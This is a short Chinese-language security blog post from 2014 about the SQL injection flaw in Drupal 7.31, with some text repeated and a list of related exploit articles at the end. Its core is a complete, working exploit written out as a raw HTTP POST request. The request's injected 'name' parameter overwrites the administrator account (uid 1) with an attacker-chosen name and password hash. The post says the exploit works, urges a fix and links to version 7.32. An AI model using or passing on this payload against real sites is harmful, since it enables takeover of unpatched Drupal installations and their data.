Drupal 7.31版本爆严重SQL注入漏洞
2014-10-16 12:54
639 查看
今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码。
在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。
测试代码:(请勿用于非法用途)
本地环境测试效果:
请相关厂商关注,并尽快修复漏洞。
新版下载:
https://www.drupal.org/drupal-7.32
在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。
测试代码:(请勿用于非法用途)
POST /drupal-7.31/?q=node&destination=node HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/drupal-7.31/ Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 231 name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
本地环境测试效果:
请相关厂商关注,并尽快修复漏洞。
新版下载:
https://www.drupal.org/drupal-7.32
相关文章推荐
- Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
- Drupal 7.31 SQL注入漏洞利用具体解释及EXP
- Drupal 7.31 SQL注入漏洞利用详解及EXP
- Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
- 【安全牛学习笔记】KALI版本更新和手动漏洞挖掘(SQL注入)
- ThinkPHP最新版本SQL注入漏洞
- DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
- googInvision Power Board 1.3.1及更低版本SQL注入漏洞le的蜘蛛来了
- 【安全牛学习笔记】KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入)
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- 对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
- IPB论坛1.3.1及更低版本SQL注入漏洞
- ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法
- DedeCMS全版本通杀SQL注入漏洞利用代码
- Invision Power Board 1.3.1及更低版本SQL注入漏洞
- Joomla 3.4.3版本 SQL注入漏洞分析
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具